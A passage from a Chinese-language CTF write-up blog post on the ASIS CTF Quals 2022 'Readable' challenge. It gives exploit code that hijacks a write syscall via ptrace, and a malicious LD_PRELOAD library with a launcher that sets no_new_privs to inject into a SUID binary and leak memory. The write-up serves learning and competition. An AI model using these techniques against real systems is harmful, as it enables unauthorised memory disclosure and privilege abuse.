class="hljs-comment">// 随便劫持一个 Write 的系统调用，rsi 劫持到基址，rdx 大小大一点</span><br>        <span class="hljs-keyword">if</span> (regs-&gt;orig_rax == <span class="hljs-number">1</span> &amp;&amp; regs-&gt;rdx == <span class="hljs-number">0x10</span>) &#123;<br>            blocked = <span class="hljs-number">1</span>;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Rsi before:%08llx\n&quot;</span>,regs-&gt;rsi);<br>            regs-&gt;rdx = <span class="hljs-number">0x2000</span>;<br>            regs-&gt;rsi = base;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Rsi after:%08llx\n&quot;</span>,regs-&gt;rsi);<br>            <span class="hljs-comment">// ptrace(PTRACE_SETREGS, pid, 0, regs);</span><br>            syscall(<span class="hljs-number">0x40000209</span>,PTRACE_SETREGS, pid, <span class="hljs-number">0</span>, regs);<br>        &#125;<br>        <span class="hljs-comment">// Continue on with the now blocked syscall</span><br>        <span class="hljs-comment">// ptrace(PTRACE_SYSCALL, pid, 0, 0);</span><br>        syscall(<span class="hljs-number">0x40000209</span>,PTRACE_SYSCALL, pid, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br><br>        waitpid(pid, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br>        <span class="hljs-comment">// If the program checks return value of the write, we need to make sure that the return value isn&#x27;t `-ENOSYS`</span><br>        <span class="hljs-comment">// if (blocked) &#123;regs-&gt;rax = 1; ptrace(PTRACE_SETREGS, pid, 0, regs); &#125;</span><br>        <span class="hljs-keyword">if</span> (blocked) &#123;regs-&gt;rax = <span class="hljs-number">1</span>; syscall(<span class="hljs-number">0x40000209</span>,PTRACE_SETREGS, pid, <span class="hljs-number">0</span>, regs); <span class="hljs-keyword">break</span>;&#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016020408849.png" srcset="/img/loading.gif" lazyload alt="image-20221016020408849"></p>
<h3 id="Exp2-LD-PRELOAD"><a class="header-anchor" href="#Exp2-LD-PRELOAD">¶</a>Exp2(LD_PRELOAD)</h3>
<p>结束后在 Discord 看到空白师傅发的 Exp，陷入了沉思 🤔：</p>
<p><img src="D:/Blog/n1ghtu/source/_posts/assets/image-20221016022109570.png" srcset="/img/loading.gif" lazyload alt="image-20221016022109570"></p>
<p>我们知道，设置了 SUID 的程序（本题的 <code>readme</code>）一般不走 LD_PRELOAD 等环境变量(<a target="_blank" rel="noopener" href="https://linux.die.net/man/8/ld.so">文档</a>)。</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">LD_PRELOAD</span><br>要在所有其他共享库之前加载的附加的、用户指定的 <span class="hljs-string">ELF</span> 共享库的列表。列表中的项目可以用空格或冒号分隔。这可用于选择性地覆盖其他共享库中的函数。使用描述下给出的规则搜索库。对于 <span class="hljs-built_in">set-user-ID/set-group-ID</span> <span class="hljs-string">ELF</span> 二进制文件，包含斜杠的预加载路径名将被忽略，并且只有在库文件上启用了 <span class="hljs-built_in">set-user-ID</span> 权限位时才会加载标准搜索目录中的库。<br><span class="hljs-string">LD_DEBUG</span><br>（<span class="hljs-string">glibc</span> 自 <span class="hljs-string">2</span>.<span class="hljs-string">1</span> 起）输出有关动态链接器的详细调试信息。如果设置为<span class="hljs-string">all</span>，则打印它拥有的所有调试信息，如果设置为 <span class="hljs-string">help</span> ，则打印一条帮助消息，说明可以在此环境变量中指定哪些类别。从 <span class="hljs-string">glibc</span> <span class="hljs-string">2</span>.<span class="hljs-string">3</span>.<span class="hljs-string">4</span>开始，对于 <span class="hljs-built_in">set-user-ID/set-group-ID</span> 二进制文件 ， <span class="hljs-string">LD_DEBUG</span>被忽略。<br></code></pre></td></tr></table></figure>
<p>事后我去请教了下空白师傅，大意是走不走 LD_PRELOAD 这种变量，其实是根据 SUID <strong>是否真实生效</strong>来判断的。这里通过 prctl <strong>禁止</strong>了 SUID 生效，那么接下来程序内执行的文件就不再当做 SUID 文件处理。</p>
<ul>
<li>为什么 prctl 可以禁止 SUID 生效？</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt">文档</a>是我👴🏻👴🏻，可以看到 SUID 被点名表扬：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-title class_">The</span> execve system call can grant a newly-started program privileges that<br>its parent did not have.  <span class="hljs-title class_">The</span> most obvious examples are setuid/setgid<br>programs and file capabilities.  <span class="hljs-title class_">To</span> prevent the parent program <span class="hljs-keyword">from</span><br>gaining these privileges <span class="hljs-keyword">as</span> well, the kernel and user code must be<br>careful to prevent the parent <span class="hljs-keyword">from</span> doing anything that could subvert the<br>child.  <br>...<br></code></pre></td></tr></table></figure>
<p>所以我们也可以简单的写出 Exp：</p>
<p>先整个库，然后简单转换下格式放到 exp 里面。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">puts</span><span class="hljs-params">(<span class="hljs-type">char</span> *data)</span> &#123;<br>    write(<span class="hljs-number">1</span>,data<span class="hljs-number">-0x100</span>,<span class="hljs-number">0x100</span>);<br>&#125;<br></code></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc -shared -fPIC a.c -o evil.so<br></code></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ptrace.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/wait.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;errno.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/personality.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/user.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/mman.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/prctl.h&gt;</span></span><br><span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> <span class="hljs-type">long</span> base = <span class="hljs-number">0</span>;<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">user_regs_struct</span> *<span class="hljs-title">regs</span> =</span> <span class="hljs-literal">NULL</span>;<br><br><span class="hljs-type">char</span> evilso[] = &#123;太长不写&#125;;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>    FILE *fp = fopen(<span class="hljs-string">&quot;/tmp/evil.so&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>);<br>    fwrite(evilso,<span class="hljs-keyword">sizeof</span>(evilso),<span class="hljs-number">1</span>,fp);<br>    fclose(fp);<br>    prctl(PR_SET_NO_NEW_PRIVS,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>);<br>    <span class="hljs-type">char</span> *args[] = &#123;<span class="hljs-string">&quot;readme&quot;</span>,<span class="hljs-literal">NULL</span>&#125;;<br>    <span class="hljs-type">char</span> *envp[] = &#123;<span class="hljs-string">&quot;LD_PRELOAD=/tmp/evil.so&quot;</span>,<span class="hljs-literal">NULL</span>&#125;;<br>    execve(<span class="hljs-string">&quot;/home/pwn/readme&quot;</span>,args,envp);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016135122114.png" srcset="/img/loading.gif" lazyload alt="image-20221016135122114"></p>
<h3 id="Exp3-Seccomp-Notify-working…"><a class="header-anchor" href="#Exp3-Seccomp-Notify-working…">¶</a>Exp3(Seccomp Notify)(working…)</h3>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016023043480.png" srcset="/img/loading.gif" lazyload alt="image-20221016023043480"></p>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016023104368.png" srcset="/img/loading.gif" lazyload alt="image-20221016023104368"></p>
<p>后来发现上面俩解都不是预期解，实在是太😈了。</p>
<p>那么观察出题人Discord发言，预期是一个叫 <code>Seccomp Notify</code> 的机制，昂，也能拦截系统调用然后进行劫持。</p>
<p>由于 <code>Ubuntu 1804</code> 貌似缺了库啥的，干脆直接开个 Socat 拿 2204 测试后打。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">socat TCP-LISTEN:6000,fork,reuseaddr EXEC:<span class="hljs-string">&quot;python3 deploy.py&quot;</span>,pty,stderr<br></code></pre></td></tr></table></figure>
<h2 id="jsy-5-solves-Working…"><a class="header-anchor" href="#jsy-5-solves-Working…">¶</a>jsy(5 solves)(Working…)</h2>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016122254774.png" srcset="/img/loading.gif" lazyload alt="image-20221016122254774"></p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<p><a target="_blank" rel="noopener" href="https://github.com/justcatthefish/justctf-2022/tree/main/challenges/pwn_dumpme">JustCTF2022 - pwn_dumpme</a></p>
<p><a target="_blank" rel="noopener" href="https://linux.die.net/man/8/ld.so">ld.so 文档 - man</a></p>
<p><a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt">PR_SET_NO_NEW_PRIVS</a></p>
<p><a target="_blank" rel="noopener" href="http://just4coding.com/2022/04/03/seccomp/">Seccomp机制与seccomp notify介绍 - Just For Coding</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ASIS CTF Quals 2022 Readable&amp;Jsy</div>
      <div>http://n1ghtu.github.io/posts/66d9c745.html</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Nightu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年10月16日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/posts/f584cbf7.html" title="最近在摸什么鱼">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">最近在摸什么鱼</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/161033ee.html" title="关于 Jail (Working...)">
                        <span class="hidden-mobile">关于 Jail (Working...)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a><span>Nightus Blog</span></a><br/> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Powered by Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
